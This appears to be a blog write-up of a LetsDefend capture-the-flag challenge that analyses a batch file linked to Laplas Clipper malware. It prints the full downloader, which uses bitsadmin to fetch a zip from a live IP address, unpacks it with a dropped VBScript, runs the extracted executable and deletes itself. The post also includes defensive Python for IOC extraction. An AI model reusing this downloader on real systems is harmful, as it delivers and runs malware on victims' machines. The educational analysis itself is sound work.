A malicious batch file has been discovered that downloads and executes files associated with the Laplas Clipper malware. Analyze this batch file to understand its behavior and help us investigate its activities.


Introduction

Happy holidays everyone! The new year is quickly approaching and I have no plans of slowing down. Today we’ll be going through another LetsDefend challenge - Batch Downloader.

Batch files were my introduction to programming and computing. I wrote some small batch files to copy files and easily install Minecraft mods, something along those lines. The number of resources available online even back then, in the early 2000s, made me want to get into software development. Looking back, Python might have been better to learn, but I’ll still have those memories of writing my first batch file.

Let’s answer some questions!


Question one

What command is used to prevent the command echoing in the console?


First things first we need to check on the batch file that this whole scenario is about.

LetsDefend gives us access to a web-based virtual machine. The batch file is located in a zip file at C:\Users\LetsDefend\Desktop\ChallengeFile. You can go through and extract the batch file, or just refer to it here:

 1  @echo off
 2  bitsadmin /transfer System /Download /Priority FOREGROUND http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip
 3  setlocal
 4  cd /d %~dp0
 5  Call :UnZipFile "%TEMP%" "%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"
 6  cd /d "%TEMP%"
 7  start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"
 8  del %~s0 /q
 9
10  :UnZipFile <ExtractTo> <newzipfile>
11  set vbs="%TEMP%\_.vbs"
12  if exist %vbs% del /f /q %vbs%
13  >%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
14  >>%vbs% echo If NOT fso.FolderExists(%1) Then
15  >>%vbs% echo fso.CreateFolder(%1)
16  >>%vbs% echo End If
17  >>%vbs% echo set objShell = CreateObject("Shell.Application")
18  >>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
19  >>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
20  >>%vbs% echo Set fso = Nothing
21  >>%vbs% echo Set objShell = Nothing
22  cscript //nologo %vbs%
23  if exist %vbs% del /f /q %vbs%

One of the first things I learned when writing batch files was how to stop commands from showing in the console. The Wikipedia article on batch files has a Hello World! example:

@ECHO OFF
ECHO Hello World!
PAUSE

There’s even a nicely written explanation of what each line does:

The @ symbol at the start of any line prevents the prompt from displaying that command as it is executed. The command ECHO OFF turns off the prompt permanently, or until it is turned on again.

There’s our first answer.


Question two

Which tool is used to download a file from a specified URL in the script?


We’ve seen what the first line of the script does (@echo off). We can move on to the second line and break it down:

bitsadmin /transfer System /Download /Priority FOREGROUND http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip

bitsadmin is a command I’m unfamiliar with. Looking at this second line in its entirety reminds me of iex, or Invoke-Expression. I see a lot of PowerShell scripts with iex in ClickFix reporting and in my own findings. If we read the MS Learn docs for bitsadmin we can see that it’s a tool to manage file uploads and downloads.

Unsurprisingly, the /transfer option transfers one or more files. Its parameters clarify the rest of the line.

  • name - This is the first parameter after /transfer. We can see now that the name of this job is System.
  • type - /Download is the parameter given in the script. The other valid option is /Upload.
  • priority - This is an optional argument that is included in the malicious script. The priority is given as FOREGROUND, the highest level, above HIGH.
  • remotefilename - This is the next parameter and points us to the remote file http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip. If we were writing IOCs for this incident we could safely include this IP address and the name and file hash of the .zip file.
  • localfilename - The final parameter is the name/location of the output file. In this case it will be written to %TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip.

We understand what the second line does now, and the answer to the second question is simply bitsadmin. It’s important to understand how a malicious script runs and what it’s doing. Reporting the IOCs in scripts and understanding how attacks work is a fun part of the job!

Just note that most malicious scripts would be obfuscated, so you shouldn’t expect easy-to-read batch scripts in the wild.
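The parameter breakdown above maps directly onto a small triage routine. The following Python is an added example, not part of the LetsDefend challenge or the original post: it parses a bitsadmin /transfer command line (as it would appear in a process-creation log) into the documented parameters and pulls out the IOCs an analyst would report; the sample line is the second line of the script, and the flag rules are the author's own heuristics.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the second line of the analysed batch file as it would
# appear in a process-creation log's CommandLine field.
SAMPLE = ('bitsadmin /transfer System /Download /Priority FOREGROUND '
          'http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip '
          '%TEMP%\\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip')

def parse_bitsadmin_transfer(cmdline):
    # Order per MS Learn: name, optional /download|/upload, optional
    # /priority <level>, then one or more remoteURL localName pairs.
    tokens = cmdline.split()  # paths in this sample carry no spaces
    if len(tokens) < 5 or [t.lower() for t in tokens[:2]] != ['bitsadmin', '/transfer']:
        return None
    job = {'name': tokens[2], 'type': 'download', 'priority': 'normal'}
    i = 3
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok in ('/download', '/upload'):
            job['type'], i = tok[1:], i + 1
        elif tok == '/priority' and i + 1 < len(tokens):
            job['priority'], i = tokens[i + 1].lower(), i + 2
        else:
            break
    rest = tokens[i:]
    job['files'] = [{'remote': r, 'local': l} for r, l in zip(rest[0::2], rest[1::2])]
    return job

def triage(cmdline):
    # Pull IOCs out of the job and list why an analyst would flag it.
    job = parse_bitsadmin_transfer(cmdline)
    if job is None:
        return None
    iocs, flags = [], []
    for f in job['files']:
        host = urlparse(f['remote']).hostname or ''
        iocs.append({'url': f['remote'], 'host': host, 'dropped': f['local']})
        if re.fullmatch(r'\d{1,3}(\.\d{1,3}){3}', host):
            flags.append('remote host is a bare IP address')
        if re.search(r'%temp%|\\temp\\', f['local'], re.I):
            flags.append('file dropped into a temp directory')
        if re.search(r'\.(pdf|docx?|xlsx?|jpe?g)\.(zip|exe|scr)$', f['local'], re.I):
            flags.append('double extension on dropped file name')
    if job['priority'] == 'foreground':
        flags.append('FOREGROUND priority: transfer is not throttled')
    return {'job': job, 'iocs': iocs, 'flags': flags}

if __name__ == '__main__':
    print(triage(SAMPLE))
```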


Question three

What is the priority set for the download operation in the script?


After breaking that second line down and understanding all the parameters we know that the priority is set to FOREGROUND.


Question four

Which command is used to start localization of environment changes in the script?


We’re up to the fourth question of this challenge, time to move on to third line of the script:

setlocal

We can look at the documentation for setlocal, which gives a pretty big clue to the answer:

Starts localization of environment variables in a batch file. Localization continues until a matching endlocal command is encountered or the end of the batch file is reached.


Question five

Which IP address is used by malicious code?


We can go back to the second line of the malicious script for this answer. Specifically the remotefilename parameter: ... http://193.169.255.78/FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip ...

The IP address hosting the remote .zip file is the answer.


Question six

What is the name of the subroutine called to extract the contents of the zip file?


We need to look at batch file syntax to confirm how subroutines are declared. From previous experience I know that subroutines can be thought of as being similar to methods or classes in Python. The goto command jumps directly to a line declared with a leading colon, something like :DeleteFiles for a routine that deletes files in some wiper malware, for example.

The documentation for the goto command has an example that shows how goto and ‘subroutines’ can be used:

echo off
format a: /s
if not errorlevel 1 goto end
echo An error occurred during formatting.
:end
echo End of batch program.

For reference, this batch program formats a disk in drive A as a system disk. If the operation is successful, the goto command directs processing to the :end label. For the purpose of this question and this scenario we’re treating subroutines and labels as the same thing.

Looking at the script we can see that the label :UnZipFile is declared before all of its logic. This label/subroutine is our answer.


Question seven

Which command attempts to start an executable file extracted from the zip file?


Let’s take a closer look at line 7 of the script:

 7  start "" "FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe"

This attempts to start the FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.exe executable. The entire line is the answer.


Question eight

Which scripting language is used to extract the contents of the zip file?


The :UnZipFile subroutine that we looked at in question six holds the answer for this:

:UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
cscript //nologo %vbs%
if exist %vbs% del /f /q %vbs%

If you’ve written macros for Word or other Office applications this should look pretty familiar to you! The redirections into %vbs% on almost every line are a good giveaway as well: each echo appends one line to the _.vbs file, which cscript then runs. If you’re still not sure, a quick search for VBS should find the Wikipedia article for VBScript. It’s a language I haven’t seen much in the past few years, but it can be useful for Windows based malware as the Windows Script Host runs it out of the box.
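To see exactly what the subroutine leaves in %TEMP%\_.vbs, the following Python (an added example, not from the original post or the challenge) replays the > and >> echo redirections of the subroutine with the Call line's arguments substituted, the way cmd.exe would before the file is handed to cscript; the victim's %TEMP% path is an assumed value.

```python
import re

# Constructed input: the :UnZipFile subroutine from the analysed batch file,
# the arguments the Call line passes to it, and an assumed victim %TEMP%.
SUBROUTINE = r''':UnZipFile <ExtractTo> <newzipfile>
set vbs="%TEMP%\_.vbs"
if exist %vbs% del /f /q %vbs%
>%vbs%  echo Set fso = CreateObject("Scripting.FileSystemObject")
>>%vbs% echo If NOT fso.FolderExists(%1) Then
>>%vbs% echo fso.CreateFolder(%1)
>>%vbs% echo End If
>>%vbs% echo set objShell = CreateObject("Shell.Application")
>>%vbs% echo set FilesInZip=objShell.NameSpace(%2).items
>>%vbs% echo objShell.NameSpace(%1).CopyHere(FilesInZip)
>>%vbs% echo Set fso = Nothing
>>%vbs% echo Set objShell = Nothing
cscript //nologo %vbs%
if exist %vbs% del /f /q %vbs%
'''
CALL_ARGS = ['"%TEMP%"', r'"%TEMP%\FW-APGKSDTPX4HOAUJJMBVDNXPOHZ.PDF.zip"']
ENV = {'TEMP': r'C:\Users\victim\AppData\Local\Temp'}  # assumed value

ECHO_LINE = re.compile(r'^(>>?)\s*%(\w+)%\s+echo\s(.*)$')

def expand(text, env):
    # cmd.exe expands %NAME% before the line runs; unknown names are left as-is.
    return re.sub(r'%(\w+)%', lambda m: env.get(m.group(1).upper(), m.group(0)), text)

def reconstruct_dropped_scripts(batch_text, args, env):
    """Replay every `>file echo ...` / `>>file echo ...` line and return
    {redirect variable: file contents}. `>` truncates, `>>` appends, and
    %1, %2, ... are replaced with the (already expanded) Call arguments."""
    args = [expand(a, env) for a in args]
    files = {}
    for line in batch_text.splitlines():
        m = ECHO_LINE.match(line.strip())
        if not m:
            continue
        op, var, payload = m.groups()
        for n, value in enumerate(args, start=1):
            payload = payload.replace(f'%{n}', value)
        if op == '>':
            files[var] = []          # a single '>' starts the file over
        files.setdefault(var, []).append(expand(payload, env))
    return {var: '\r\n'.join(lines) + '\r\n' for var, lines in files.items()}

def dropped_script_paths(batch_text, env):
    # Tie each redirect variable to the on-disk path its `set` line assigns.
    return {name: expand(path, env)
            for name, path in re.findall(r'^set\s+(\w+)="([^"]+)"', batch_text, re.M)}
```

Printing reconstruct_dropped_scripts(SUBROUTINE, CALL_ARGS, ENV)['vbs'] gives the nine-line VBScript that creates the extraction folder if needed and uses Shell.Application's CopyHere to unpack the archive, which is the content you would expect to recover from %TEMP%\_.vbs if the self-cleanup on the last line had not run.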


Conclusion


A nice little room before the end of the year. I’ve finally updated this site to show filters for the platforms, and I’ve been messing around with the way code blocks are displayed, which is nice. In the future you’ll see a lot more highlighting and language-specific syntax. Yay!